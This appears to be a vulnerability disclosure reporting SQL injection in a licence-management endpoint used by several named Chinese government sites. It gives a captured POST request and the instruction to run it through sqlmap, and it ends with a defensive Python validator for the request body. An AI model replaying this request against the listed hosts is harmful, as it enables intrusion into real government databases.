### Brief description:

As per the title.

### Details:

Generic SQL injection #3 in a system used by government sites. The cases are as follows:

- http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp
- http://117.40.187.175:8008/outportal/licenseManage/licenseManage.jsp
- http://xzfw.jinxi.gov.cn/outportal/licenseManage/licenseManage.jsp
- http://xzfw.jxcr.gov.cn/outportal/licenseManage/licenseManage.jsp
- http://120.203.196.20/outportal/licenseManage/licenseManage.jsp

### Proof of vulnerability:

The request has to be captured separately for each site.

http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp

POST parameters:

```
POST /outportal/command/ajax/com.ecgap.outinformationdocument.cmd.OutInformationDocumentQueryCommand/getLicese HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp
x-requested-with: XMLHttpRequest
Content-Type: application/json
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: wssp.jiangxi.gov.cn:8008
Content-Length: 108
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=EE31BE605CD71740C767AF5FA575E5D6

{"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"acceptno":"1","cerno":"1"},"length":2}}
```

Run it with `sqlmap -r`.

[![021553305104c61cce41f73df23babce9ee628b4.png](https://images.seebug.org/upload/201505/192030466ed35e27170a57b752c4a441fc398bfb.png)](https://images.seebug.org/upload/201505/192030466ed35e27170a57b752c4a441fc398bfb.png)

[![0215534880d275746dc39d36faf798203acc1f4b.png](https://images.seebug.org/upload/201505/1920305303b8fdf4f4bec380cf064063d7e79eb2.png)](https://images.seebug.org/upload/201505/1920305303b8fdf4f4bec380cf064063d7e79eb2.png)
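For defenders reviewing gateway or application logs for this endpoint, the following added example (not part of the original report and not the vendor's code) screens the `ParameterSet` JSON body shown above. The allowlist pattern for `acceptno` and `cerno` and the function name `check_parameter_set` are assumptions, since the report does not document the real value format.

```python
import json
import re

# Assumption: acceptance and certificate numbers are short alphanumeric IDs.
# The report does not document their real format; adjust the pattern to match.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,64}")
EXPECTED_CLASS = "org.loushang.next.data.ParameterSet"
EXPECTED_KEYS = {"acceptno", "cerno"}


def check_parameter_set(body: str) -> list[str]:
    """Return a list of findings for one JSON request body (empty = clean)."""
    try:
        params = json.loads(body)["params"]
        values = params["map"]
    except (ValueError, KeyError, TypeError):
        return ["body is not a ParameterSet envelope"]
    if not isinstance(values, dict):
        return ["map is not an object"]
    findings = []
    if params.get("javaClass") != EXPECTED_CLASS:
        findings.append("unexpected javaClass")
    if params.get("length") != len(values):
        findings.append("length does not match map size")
    for key, value in values.items():
        if key not in EXPECTED_KEYS:
            findings.append(f"unexpected key: {key}")
        elif not isinstance(value, str) or not SAFE_VALUE.fullmatch(value):
            findings.append(f"value outside allowlist: {key}")
    return findings


# Constructed sample bodies: the first is the request body shown above,
# the second carries a quote character in one field.
BENIGN = ('{"params":{"javaClass":"org.loushang.next.data.ParameterSet",'
          '"map":{"acceptno":"1","cerno":"1"},"length":2}}')
SUSPECT = ('{"params":{"javaClass":"org.loushang.next.data.ParameterSet",'
           '"map":{"acceptno":"1\'","cerno":"1"},"length":2}}')

if __name__ == "__main__":
    for body in (BENIGN, SUSPECT):
        print(check_parameter_set(body) or "clean")
```

This is a screening layer only; the underlying fix is for the server-side command to bind these values as query parameters instead of concatenating them into SQL.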